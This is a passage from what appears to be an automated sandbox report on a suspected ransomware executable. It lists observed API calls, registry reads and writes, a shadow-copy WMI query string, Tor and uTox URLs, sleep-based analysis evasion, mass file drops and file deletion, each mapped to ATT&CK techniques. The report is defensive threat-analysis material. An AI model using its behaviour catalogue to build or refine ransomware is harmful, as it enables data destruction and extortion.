\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\8F46B1FEA15369E70B8B3919DB81D2CD4D7428C75A5208AA0313A03E8B938E21.EXE\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\8F46B1FEA15369E70B8B3919DB81D2CD4D7428C75A5208AA0313A03E8B938E21.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-507", "type": 2, "relevance": 1, "name": "References to WMI query strings used for information discovery", "description": "Found string \"SELECT * FROM Win32_ShadowCopy\" (Indicator: \" Win32_Shadowcopy\"; Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp, 00000000-00002940.00000002.251733.00420000.00000004.mdmp\")\n Found string \"FROM Win32_ShadowCopy\" (Indicator: \" Win32_Shadowcopy\"; Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp, 00000000-00002940.00000002.251733.00420000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\System32\\*.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter accessibilitycpl.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter ACCTRES.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter acledit.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter aclui.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter acmigration.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter acppage.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter acproxy.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter ActionCenter.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter ActionCenterCPL.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter ActionQueue.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter activeds.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter actxprxy.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter AdmTmpl.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter adprovider.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter adsldp.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter adsldpc.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter adsmsext.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter adsnt.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter adtschema.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter advapi32.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter advpack.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter aecache.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter aeevts.dll (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"FindNextFileW\" with parameter aeinv.dll (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-131", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the specified system metric or system configuration setting (API string)", "description": "Found reference to API \"11327148873,3660,111,,GetSystemMetrics,user32.dll,\"252:50:00.952\",RX=0,PX=0\" (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00002940.00000000.247890.00420000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"83472950333,2752,3117,,FindNextFileW,kernel32.dll,\"252:58:31.414\",RX=0,PX=0\" (Indicator: \"FindNextFile\"; Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp\")\n Found reference to API \"155520274219,2752,3117,,FindNextFileW,kernel32.dll,\"253:03:13.444\",RX=0,PX=0\" (Indicator: \"FindNextFile\"; Source: \"00000000-00002940.00000002.251733.00420000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"https://www.torproject.org/write\"\n Heuristic match: \"admtmpl.dm\"\n Heuristic match: \"mtmpl.dm\"\n Pattern match: \"https://www.torproject.org/\"\n Pattern match: \"https://utox.org/\"\n Pattern match: \"https://utox.org/utox_win64.exe\"\n Heuristic match: \"32\\tools\\scripts\\cleanfuture.py\"\n Heuristic match: \"\\?\\c:\\users\\hapubws\\appdata\\local\\programs\\python\\python38-32\\tools\\demo\\ss1.py\"\n Heuristic match: \"??\\c:\\users\\hapubws\\appdata\\local\\programs\\python\\python38-32\\tools\\demo\\ss1.py\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"https://www.torproject.org/\" - Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp\")\n Found URL \"https://utox.org/\" - Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp\")\n Found URL \"https://utox.org/utox_win64.exe\" - Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp\")\n Found URL \"https://www.torproject.org/\" - Source: \"00000000-00002940.00000002.251733.00420000.00000004.mdmp\")\n Found URL \"https://utox.org/\" - Source: \"00000000-00002940.00000002.251733.00420000.00000004.mdmp\")\n Found URL \"https://utox.org/utox_win64.exe\" - Source: \"00000000-00002940.00000002.251733.00420000.00000004.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.20960450678186", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: YARA signature match - AES encryption\n Matched sigs: Sample file has high entropy (likely encrypted/compressed content)", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: YARA signature match - AES encryption\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential URLs in memory dumps\n Matched sigs: Found potential IP address in binary/memory", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\NETLOGON\\PARAMETERS\"; Key: \"EXPECTEDDIALUPDELAY\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"B+ncalrpc:[Ob\" (Indicator: \"ncalrpc\"; Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp, 00000000-00002940.00000002.251733.00420000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" claimed CRC 179995 while the actual is CRC 172545", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "GetModuleHandleA\n GetCommandLineW\n GetCommandLineA\n GetFileAttributesW\n GetProcAddress", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-5538816 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-5539043 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-5738226 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-5738459 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-6267431 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-6267734 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-6469790 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-6470057 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-6672200 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-6672510 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-6874610 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-6875022 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7076965 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7077297 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7279308 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7279607 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7575104 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7575387 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7777544 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7778149 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7979930 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-7980479 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-8197876 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-8198412 [PID: 2940]\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" queried SystemProcessInformation at 00000000-00002940-00000105-8415751 [PID: 2940]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has section name .text with entropy \"6.61353097254\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has section name .data with entropy \"7.98738143479\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has section name .pdata with entropy \"7.78742389699\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has section name .reloc with entropy \"6.72853329511\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-47", "type": 6, "relevance": 10, "name": "Possibly tries to evade analysis by sleeping many times", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Thread ID: 2948) slept \"525\" times (threshold: 500)", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"475248\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"2292084\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"0\"}\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"475338\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"2292084\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"0\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-109", "type": 6, "relevance": 10, "name": "Calls an API typically used to determine the valid logical drives on the computer", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"260\"\n \"lpBuffer\": \"C:\\\\\"}\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"0\"}\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"9\"\n \"lpBuffer\": \"C:\\\\\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "binary-10", "type": 8, "relevance": 5, "name": "The input sample dropped very many files", "description": "The input sample dropped 704 files (often an indicator for ransomware)", "origin": "Binary File", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.3OYKMRLQX\"; Key: \"(DEFAULT)\"; Value: \"3OYkmrLQx\"), \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\3OYKMRLQX\\DEFAULTICON\"; Key: \"(DEFAULT)\"; Value: \"%ALLUSERSPROFILE%\\3OYkmrLQx.ico\"), \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"GLOBALASSOCCHANGEDCOUNTER\"; Value: \"65000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" marked \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\ZZZZZZZZZZZ\" for deletion", "origin": "API Call", "attck_id": "T1070.004", 